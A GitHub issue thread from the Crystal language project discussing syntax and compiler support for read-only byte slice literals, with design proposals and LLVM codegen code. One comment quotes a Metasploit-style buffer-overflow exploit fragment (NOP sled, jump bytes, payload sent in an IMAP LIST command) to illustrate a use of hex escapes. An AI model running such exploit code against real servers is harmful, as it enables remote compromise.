### ISSUE TITLE
Literals for Slice(UInt8)

### ISSUE THREAD

**Issue by asterite** [crystal-lang/crystal#2886]
We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.

There are several ways we can fix this:
1. We can add back the `\x...` escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve #2565 because inspecting a string with non-valid codepoints will output `\x...` for those values.
2. We add a literal for something like a `Slice(UInt8)`. It could just be `Slice(UInt8)`, but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and writes to it. There was the idea of introducing `const [...]` for this, with which we could create static data for any kind of integer value.
3. Other options...?

This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.

**Comment by jhass** [comment]
I would tend towards 2 with something like https://github.com/crystal-lang/crystal/pull/2791#issuecomment-225299043 as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485.

**Comment by ysbaddaden** [comment]
Same here: `Slice(UInt8)` is the de-facto type for binary data whereas `String` may only contain UTF-8 data. I don't think it's a good idea to push the idea that it's okay to put arbitrary bytes into a String.

> inspecting a string with non-valid codepoints will output `\x...` for those values

But I like that.

**Comment by asterite** [comment]
One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking `HTTP::Client.post`. I think I like that, it's pretty convenient. Otherwise we'd need to add overloads or restrictions for `Slice(UInt8)`, and `HTTP::Request` will have the body as `String | Slice(UInt8)`, etc.

To compare with other statically typed languaged, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings

Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well.

**Comment by jhass** [comment]
I very much like that String is supposed to handle UTF-8 valid data and operations on that. And nothing else. I would hate to loose that property and rather prefer convenience API added to other interfaces for handling `Slice(UInt8)`. In the HTTP example binary data would need some form of content encoding to valid ASCII values anyway. Detecting to do that encoding automatically upon receiving a `Slice(UInt8)` vs a `String` seems actually easier than always second guessing whether `String` needs it or not.

**Comment by bcardiff** [comment]
I am with @jhass here. I would keep String as valid UTF-8. 

I would rather add overloads in the http client to send/receive blobs. 
And I definitely want to be able to embed binary resources (Slice or StaticArray and then a convenient api to wrap it)

**Comment by mperham** [comment]
Would it be helpful to have `Base64.decode(str, io) : Nil` so I can decode the asset and stream it out with the response?

**Comment by asterite** [comment]
@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add.

**Comment by mperham** [comment]
Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:

```ruby
    def self.serve(filename, resp)
      resp.status_code = 200
      resp.write Base64.decode(WEB_ASSETS[filename])
    end
```

I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes.  Anyone know why the server response is not writing the entire Slice to the client?

**Comment by asterite** [comment]
@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well.

**Comment by mperham** [comment]
Looks like the problem is related to me not setting the content-type header.  The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream".

**Comment by ozra** [comment]
Just throwing thoughts in to the mixture here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible.

**Comment by david50407** [comment]
How about provide users to create their own literal types (maybe in `%data{ ... }` format, `data` can be any words for each type, and `{}` can be `[]` or `()`) like [C++11 does](http://en.cppreference.com/w/cpp/language/user_literal)?

Then we can create some custom literals for `Slice(UInt8)`, `StaticArray(UInt8)` or other types we want? (use macro to define these works in compile-time, maybe?)

**Comment by maxpowa** [comment]
Any progress on this? Usecase in my scenario is writing bytes to an IO, as one might do when using low level packets on the wire. `io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)` doesn't provide 8 empty bytes as one might expect, but rather outputs a single empty byte.

**Comment by Exilor** [comment]
@maxpowa 
It works for me 😕 
```crystal
io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1]
```

**Comment by maxpowa** [comment]
Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @Exilor

**Comment by oprypin** [comment]
> We can add back the `\x...` escape to string literals

This has been implemented in https://github.com/crystal-lang/crystal/commit/cd8296b88d7859b8f914a0d4bf55f7c5534c5b15, by the way.

I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation...  
This should only be possible through an unsafe operation.

The alternative solution is the way to go. `Bytes` literals should definitely be a thing.

And `"\xff"` syntax should give an explicit error like "strings are for UTF-8 encoded text, not for arbitrary bytes".

Side note: in Python `\x**` means `\u{**}`.

**Comment by bararchy** [comment]
@oprypin but sometimes people need to do hideous things for hideous causes :)
this feature is important, it's heavily relaid on in fuzzers and exploit development (yes FFS using Crystal ! :) )
 https://www.offensive-security.com/metasploit-unleashed/shell/

```ruby
 def exploit
        connected = connect_login
        nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
        sjump = "\xEB\xF9\x90\x90"     # Jmp Back
        njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby  ;)         
        evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
        print_status("Sending payload")
        sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
        sock.put(sploit)
        handler
        disconnect
    end
```

etc....

**Comment by RX14** [comment]
It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax.

**Comment by oprypin** [comment]
@bararchy, thanks for a good demonstration of the point I was making... All of these should have been `Bytes`

**Comment by oprypin** [comment]
I forgot that this issue existed and just started writing a new one. 
Anyway... I'm just still appalled that there's a literal for invalid strings.

So, **ping**

Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable `Slice(UInt8)`, that's a problem. Or it used to be, not anymore! Now we even have [read-only slices](https://github.com/crystal-lang/crystal/commit/bdc81dbaaf37e5c7e8b9eb9bf1d0a620e501fc75).
So there are really no blockers now.

**Comment by asterite** [comment]
Right now this is solved because one can use a String for this, because a String can now arbitrary bytes.

I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later.

**Comment by oprypin** [comment]
pls

**Comment by asterite** [comment]
What if we add:

```crystal
b"some content"
```

For now that would be equivalent to:

```crystal
"some content".to_slice
```

and of course you can use `\xAB` for specific byte values.

We could also have:

```crystal
b'x'
```

to be the same as `'x'.ord.to_u8` and not have it compile if it doesn't fit in an UInt8, so that would be a byte literal.

**Comment by oprypin** [comment]
My suggestion that I started to write:

---

It would be a literal that does not allow `\u` escapes, and allows only ASCII characters, supplemented by the `\xff` syntax for arbitrary bytes. The literal would produce `Slice(UInt8)`.

I propose the syntax `b"foo\x12fsdfg"`, like in Python and Rust.

Side note, `Bytes[]` macro probably should be rewritten to produce a literal.

I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.

---

`"some content".to_slice` is impossible to do if hexadecimal escapes are removed from strings, which is the main problem I have

**Comment by asterite** [comment]
Oh, with `"some content".to_slice` I meant it would be equivalent to that. We could probably type `b"hello"` as a read-only `Slice(UInt8)` and put that in the ROM section of the program.

For that we'll probably need `Slice` to be part of the known types for the compiler, and have `@pointer`, `@size` and `@read_only` laid out accordingly in memory.

But for now I'd leave the ability to have `\x..` escape sequences in a String. Later we can remove them, but we'll have to make sure that there's no way to create strings that are not valid in UTF-8. Maybe that will slow down everything a bit, but, well, correct code is better than fast code.

**Comment by oprypin** [comment]
`@pointer`, `@size` and `@read_only` could be directly followed by the data itself, with `@pointer` being equal to its own address + offset.

I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is `new`, just raise the awareness. The problem is that people see nothing wrong with '\x' string literals and then intentionally seek out a way to recreate such strings "programmatically".

**Comment by RX14** [comment]
@asterite We wouldn't need to know about `Slice`'s internal layout, unlike `String`, because we can simply define that `Slice` needs to have a constructor taking a pointer and a size (which we already have). We only need to know `String`'s layout because we put the data contiguously. With `Slice` we don't need to do that. And it's probably not worth doing it since it's a struct and LLVM will optimize since both the constructor arguments are literals.

**Comment by oprypin** [comment]
@RX14, are you sure you understand the part about putting this in read-only data section?

**Comment by RX14** [comment]
@oprypin yes.... you pass a pointer to the data in the RO section to the slice contructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata.

**Comment by oprypin** [comment]
@RX14 Please reopen this

**Comment by straight-shoota** [comment]
Why was this even closed and all those other issues which are most definitely not fixed?

**Comment by HertzDevil** [comment]
I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:

```elixir
<<0x12>>             # => <<0x12>>
<<0x21>>             # => "!"
<<0xCF, 0x83>>       # => "σ"
"\xCF\x83"           # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83"       # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">>        # => <<0x12, 0xCF, 0x83>>
```

(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.)

An attractive feature about them is they can handle multibyte sequences:

```elixir
<<0x12345678::32>>        # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<18, 52, 86, 120>>

<<1.0::little>>    # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>

<<0xCF83::16>>        # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>>         # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>>      # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>
```

It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences.

It is important that both the `Bytes` itself and the data it refers to are stored in read-only memory; the `Slice` constructor that accepts a pointer is unsafe, so the data must be encapsulated behind a read-only `Bytes`, with no other way to access it.

If we have an extremely fast `String#valid_encoding?`, say even faster than `#each_char(&)`, then the performance penalties should be very minimal. So as a starter I think we should incorporate one of the algorithms in #11873. (In fact, the standard library has never used that method since its introduction.)

**Comment by philipp-kempgen** [comment]
Just to throw yet another an idea in:
Ruby has the `.b` method for strings.
https://docs.ruby-lang.org/en/3.2/String.html#method-i-b
Maybe `"bytestring\x00\x01".b` could be treated as a byteslice literal in Crystal?
(I prefer to say "a `ByteSlice`" rather than "a `Bytes`".)

Ruby also has `?…` for character literals (or rather single-character strings), even supporting control characters.
https://docs.ruby-lang.org/en/3.2/syntax/literals_rdoc.html#label-Strings

```ruby
?\C-g == ?\a  # => true
```

Then again, `b"…"` and `b'…'` or Elixir bitstrings are probably better, if they could maybe use `b(…)` or `b[…]` or `%b(…)` instead of `<<…>>`, provided they let you write things like:
```crystal
b( "filemagic", 0x01, 0x02, '\a', '\C-g' )
```

**Comment by HertzDevil** [comment]
Revisiting this issue and I believe `<<` would be syntactically ambiguous in the general case:

```crystal
<< 0xFFFF >> 4 >>
```

This is supposed to be a slice literal containing only `0xFFF`, but of course the parser doesn't know, and would report the `4` as an unexpected token. Another case is:

```crystal
foo << 4 >>
```

Is this `foo(<< 4 >>)`, or `foo.<<(4)` followed by an unexpected token? Elixir doesn't have this issue since its shift operators are [`Bitwise.<<</2`](https://hexdocs.pm/elixir/1.18.2/Bitwise.html#%3C%3C%3C/2) and [`Bitwise.>>>/2`](https://hexdocs.pm/elixir/1.18.2/Bitwise.html#%3E%3E%3E/2), instead of what most languages use.

I am now leaning towards `[= ... =]`, with the equals sign somewhat implying that the literal contents are constant:

```crystal
[= 1, 2, 3 =]
[= 0xFFFF >> 4 =]
foo [= 4 =]

# equivalent to `Slice(UInt8).literal(0x4D, 0x5A)`, including the autocasting
[= 0x4D, 0x5A =] of UInt8

# error, the square bracket and the equals sign are a single token
[ = 1 = ]
```

While we are at it, `[< ... >]` would be a good fit for [vector literals](https://github.com/crystal-lang/crystal/issues/3057), as angle brackets are frequently used to denote actual vectors in mathematics:

```crystal
[< 1, 2, 3, 4 >] # reserved for some type like `Int32x4` or `SIMD::IntVector(Int32, 4)`
```

**Comment by HertzDevil** [comment]
I would not consider a built-in marked with `@[Experimental]` a resolution yet.

**Comment by ysbaddaden** [comment]
What would be needed to remove the experimental annotation?

If we really want a literal syntax, I'd suggest a `%()` variant, for example `%b[12 3 127]` for Bytes. But `Bytes.literal(12, 3, 127)` sounds enough.

**Comment by straight-shoota** [comment]
Sure it's not fully resolved to a stable feature, but I suppose we're on the way to that.

Would the discussion about literal syntax change anything about the implementation that we currently have?

**Comment by HertzDevil** [comment]
> What would be needed to remove the experimental annotation?
> 
> If we really want a literal syntax

Precisely this, not just for the looks but also for compiler performance. Having a dedicated `SliceLiteral` means not needing to intercept every `Call` during the semantic phase in an awkward place. (The codegen and interpreter parts can probably be reused as-is.) The compiler ~~primitive~~ built-in was introduced to explore its semantic properties and verify that turning large `Array` constants into them can indeed reduce build times, but `Slice.literal` is never intended to be the sole representation of literals for read-only bytes or other types. It might very well disappear the moment we decide upon a true literal syntax.

Macro code is another concern. It should be possible to write, manipulate, and interpolate slice literals the same way they are written in non-macro source code. As it stands right now, writing `{{ Slice.literal(1, 2, 3) }}` will not compile, much less produce an equivalent literal. But this is never expected in the first place, just as you would not write `{{ Regex.literal("foo\\d+", i: true) }}`.

Now if we are committed to providing both a general slice literal form _and_ specialized literals for `Bytes` specifically, I wouldn't mind opening a new issue or even RFC, but at the very least I would like to gather some more opinion on the former (i.e. more alternatives to `[=`) before moving on.

Due to #14782 we cannot permit all forms of the `%b` sigil. Maybe it suffices to disallow curly brackets as the delimiters only for `%b`?

**Comment by straight-shoota** [comment]
Thanks for the context on the implementation. This clarification helps to understand where we're are. Let's continue collecting ideas for creating an RFC then👍

**Comment by straight-shoota** [comment]
I'd be cautious about adding a completely new syntax, and about a too close resemblance of array literals.
The former increases complexity, the latter might cause confusion.

In particular, `[= 0x4D, 0x5A =] of UInt8` very closely resembles `[0x4D, 0x5A] of UInt8`. I reckon that's intended, but it's perilous. The additional `=` characters do not indicate a massive significance. So it's easy to misinterpet this as an array literal with some additional semantics. But a bytes literal is fundamentally different from an array literal.

Extending percent literals seems like a good fit for this use case. Should be worth exploring. I wouldn't mind disallowing curly brace delimiters for this.

**Comment by straight-shoota** [comment]
A general consideration is whether to express byte slice literals in string or list form. Most of the earlier comments in this thread seem to suggest the content might be encoded similary to a string literal. The more recent comments from @HertzDevil use an array-like syntax where the content consists of numerical items separated by comma.
The latter certainly makes sense for a generic format that can be used with arbitrary number types. Whereas for byte slice literals specifically, a string-like form might perhaps be more ergonomical.
I'm not sure if it would be worth having an alternative string-form syntax, when we need a generic list-form anyway.

**Comment by ysbaddaden** [comment]
Thanks a lot for the details @HertzDevil 🙇 

I'm not fond of adding new syntaxes (or importing) when sigils are already there and known to represent different kinds of literals, be it in Ruby or Crystal.

**Comment by ysbaddaden** [comment]
I'd add that I'd be fine with `%UInt8[]` and `%Int64[]` so they'd be explicit to the expected type. Of course it means introducing multi-letter sigils 😅

**Comment by ysbaddaden** [comment]
I understand that the literal notation would allow to parse `11 0 127` directly as a single 3 bytes value into the AST, each value being validated while parsing, and we could just put that const value during codegen.

On the opposite `Slice.literal` means creating a `Call` with an `Array(String)` of 3 values, then validating and during semantic, and transforming the values into the actual 3 bytes const value during codegen.

Having actual literals would be more efficient?

**Comment by philipp-kempgen** [comment]
> `Slice.literal` can do that. So perhaps we should consider this issue as resolved?

I still think that in many cases there are "byte strings" to be represented, i.e. `b"foobar\x01"`, i.e. 7-bit or 8-bit "strings", whatever you want to call them. `Bytes` / `Slice(UInt8)` in Crystal terms.

Yes, a syntax like `<<< 0x66, 0x6f, 0x6f, 0x62, 0x61, 0x72, 0x01 >>>` is more generic and still useful, but doesn't cover "byte strings", in terms of readability.

Whether this discussion happens here or somewhere else is up to the developers. jm2c

**Comment by HertzDevil** [comment]
> I understand that the literal notation would allow to parse `11 0 127` directly as a single 3 bytes value into the AST, each value being validated while parsing, and we could just put that const value during codegen.

The first part is true, but the second part is not yet fully implemented; the compiler still needs to create a separate `LLVM::Value` for every element, then construct a new array from all those `LLVM::Value`s.

For byte literals we could have used `LLVMConstStringInContext2` instead, the same function that generates string literal contents, since the two are equivalent in LLVM IR, and LLVM string constants do not need to be valid UTF-8. For integers and floats up to 64 bits we could also try to create an [`llvm::ConstantDataArray`](https://github.com/llvm/llvm-project/blob/4b3f0fa7e7af69a514d7b855cff523539082b292/llvm/include/llvm/IR/Constants.h#L696) directly without going through [`LLVMConstArray2`](https://github.com/llvm/llvm-project/blob/4b3f0fa7e7af69a514d7b855cff523539082b292/llvm/lib/IR/Constants.cpp#L1342-L1345), but the corresponding LLVM C API does not exist at the moment.

The whole story would be very different if the element type can be an aggregate, e.g. to replace the arrays of tuples representing the different Unicode character categories in `src/unicode/data.cr`.

**Comment by HertzDevil** [comment]
Just to give an idea, if we define this in `llvm_ext.cpp`:

```cpp
LLVMValueRef LLVMExtConstDataArray(LLVMTypeRef ElementTy, const void *ConstantVals, uint64_t Length) {
  auto *Ty = unwrap(ElementTy);

  const char *Data = reinterpret_cast<const char *>(ConstantVals);
  if (Ty->isIntegerTy(8)) {
    return wrap(ConstantDataArray::getRaw(StringRef(Data, Length * 1), Length, Ty));
  } else if (Ty->isIntegerTy(16) || Ty->isHalfTy() || Ty->isBFloatTy()) {
    return wrap(ConstantDataArray::getRaw(StringRef(Data, Length * 2), Length, Ty));
  } else if (Ty->isIntegerTy(32) || Ty->isFloatTy()) {
    return wrap(ConstantDataArray::getRaw(StringRef(Data, Length * 4), Length, Ty));
  } else if (Ty->isIntegerTy(64) || Ty->isDoubleTy()) {
    return wrap(ConstantDataArray::getRaw(StringRef(Data, Length * 8), Length, Ty));
  } else {
    assert(0 && "Expected element type to be i8/i16/i32/i64/half/bfloat/float/double");
  }
}
```

and in the compiler do:

```crystal
module Crystal
  class CodeGenVisitor
    def define_slice_constant(info : Program::ConstSliceInfo)
      args = info.args.to_unsafe
      kind = info.element_type

      case kind
      when .i8?  then buffer = Slice(Int8).new(info.args.size) { |i| args[i].as(NumberLiteral).value.to_i8 }.to_unsafe_bytes
      when .i16? then buffer = Slice(Int16).new(info.args.size) { |i| args[i].as(NumberLiteral).value.to_i16 }.to_unsafe_bytes
      when .i32? then buffer = Slice(Int32).new(info.args.size) { |i| args[i].as(NumberLiteral).value.to_i32 }.to_unsafe_bytes
      # ditto for i64/u8/u16/u32/u64/f32/f64
      end

      llvm_element_type = llvm_type(@program.type_from_literal_kind(kind))

      if buffer
        # this is where we skip the `LLVM::Value`s
        const_data_array = LLVM::Value.new(LibLLVMExt.const_data_array(llvm_element_type, buffer.to_unsafe, info.args.size))
      else
        llvm_elements = Array.new(info.args.size) do |i|
          num = args[i].as(NumberLiteral)
          case kind
          in .i8? then llvm_element_type.const_int(num.value.to_i8)
          # ditto
          end
        end
        const_data_array = llvm_element_type.const_array(llvm_elements)
      end

      global = @llvm_mod.globals.add(llvm_element_type.array(info.args.size), info.name)
      global.linkage = LLVM::Linkage::Private
      global.global_constant = true
      global.initializer = const_data_array
    end
  end
end
```

then the time taken for the Crystal codegen phase on the following snippet:

```crystal
struct Slice(T)
  def initialize(ptr : T*, size, read_only)
  end
end

N = 1000000

{% begin %}
  x = Slice(Int32).literal({% for i in 0...N %} {{ i }}, {% end %})
{% end %}
```

goes down from 0.23s to 0.07s, and this is without eliminating the 1 million individual AST nodes yet.

**Comment by HertzDevil** [comment]
Note that if we want to precompute the literal contents right in the parser, it is best if the element type appears first; with the `[= 1, 2, 3 =] of UInt8` syntax, the parser cannot figure out the target type to cast the literals to, until it has processed all the elements, requiring some intermediary list of `Number::Primitive`s (or even more complex expressions).

**Comment by straight-shoota** [comment]
Perhaps we could utilize array-like literal for that? `Slice(UInt16){1, 2, 3, 4, 5}`.
This is exactly the use case that we want. And the regular mechanism with `.new` and appending items via `<<` doesn't work for `Slice` anyway, so it wouldn't collide with existing semantics.

It would mean hard-coding a special case for `Slice` in the parser. But I figure that shouldn't be much of a problem.

**Comment by ysbaddaden** [comment]
Doesn't it also happen with `Hash`? I assume the parser is handling `Hash{}`. The main difference is maybe that `Hash` is a primitive when `Slice` isn't (it's fully defined in stdlib), but since introduce a literal that will make Slice a primitive too?.

**Comment by HertzDevil** [comment]
The slice element type would also need the `::` qualifier. But in that case it would be extremely confusing to teach people that `::Slice(::UInt8){...}` is a syntactically distinct entity from `Slice(UInt8){...}` or `Slice(::UInt8){...}` or `::Slice(UInt8){...}`.

While we used `$Slice` internally during codegen, I wonder if we can similarly use `$` in normal code as well, i.e. `$Slice(UInt8){...}`. To my knowledge, `$` followed by an uppercase character is neither a pre-1.0 global variable nor a lib extern variable, so this new appearance should be unambiguous; `Slice` here does not perform path lookup, and we are free to reserve other similar literals in this manner, such as `$Vector`. It is like a sigil for containers as `%` is a sigil for string-like objects.

Still we need to figure out how element types are spelt. I think they could simply be a restricted subset of the normal type name grammar.

**Comment by ysbaddaden** [comment]
If possible I'd prefer `%Bytes` and `%Slice(UInt16)` over `$Bytes` and `$Slice(UInt16)` but that's really just my pedantic, bike shedding, yak shaving 🧠 talking.

**Comment by RX14** [comment]
I would much prefer `%` either, since the sigil already has precedent for meanings like this.

**Comment by straight-shoota** [comment]
> [`$`] is like a sigil for containers as `%` is a sigil for string-like objects.

I don't think this distinction is particularly helpful.
`%i` and `%w` are container literals (`Array(Symbol)` and `Array(String)`). And a byte slice literal could also be considered string-like.

**Comment by HertzDevil** [comment]
I too would have preferred `%` if it were unambiguous syntax in 1.x:

```crystal
macro foo
  def %Slice(x = 0)
    x
  end

  def %Slice(x = 0, &)
    yield
  end
  
  p %Slice {1} + %Slice(2) + %Slice(UInt8) {3}
end

foo # => 6

struct Tuple(*T)
  def %(t : Slice.class)
    4
  end
end

(p %Slice(UInt8)) # => 4
```

We could deprecate some more forms of the macro fresh variable syntax, but that is not enough justification to use `%Slice` at the moment.

**Comment by HertzDevil** [comment]
Do we know how many macro fresh variables in the wild start with an uppercase letter?

**Comment by bcardiff** [comment]
I doubt there are. Maybe a use for upper cased macro fresh variables would be to create classes/structs on the fly. But I 'm not sure if that is supported right now.

But even so, we can have some reserved ones like %Slice and %Bytes.

**Comment by HertzDevil** [comment]
Uppercased macro fresh variables still produce `__temp_*`, but you can simply prepend a constant name, like `FOO%var{...}`. In this context `FOO` will be part of a `MacroLiteral` so it should not be parsed as a `#%` call.

**Comment by straight-shoota** [comment]
I believe the length of this discussion has (among other things) lead to conflating two concepts, which we're both discussing in parallel:

1. A syntax for slice literals containing scalar values of arbitrary type.
2. A syntax specifically for uint8 slice literals (i.e. `Bytes`).

These two use cases are of course related, and they have some overlap. We must not entirely isolate them.
There are also further questions such as about integration between compiler and stdlib (does `Slice` become a built-in type or what type do these literals produce?).

But the special case 2. for byte slices is actually the most relevant one. That's what we need for embedding blobs (binary large objects) into Crystal programs.
Perhaps we should primarily focus on this, because it's more important and probably easier to solve. 

Technically, there is already a viable workaround with string literals + `to_slice`.
So maybe it's not that urgent per se, because it works. That's probably why even this smaller use case hasn't moved forward in 10 years, even though https://github.com/crystal-lang/crystal/issues/2886#issuecomment-332332575 already proposed a reasonable idea for conflict-free syntax.

**Comment by spuun** [comment]
In LavinMQ we used `Slice.literal` to bake blobs (html, images, javsacript, ...) into the binary, but we did however notice a huge increase in memory usage and compile times (probably due to all AST nodes), so we had to switch back to the somewhat ugly but functional `"<data>".to_slice`.
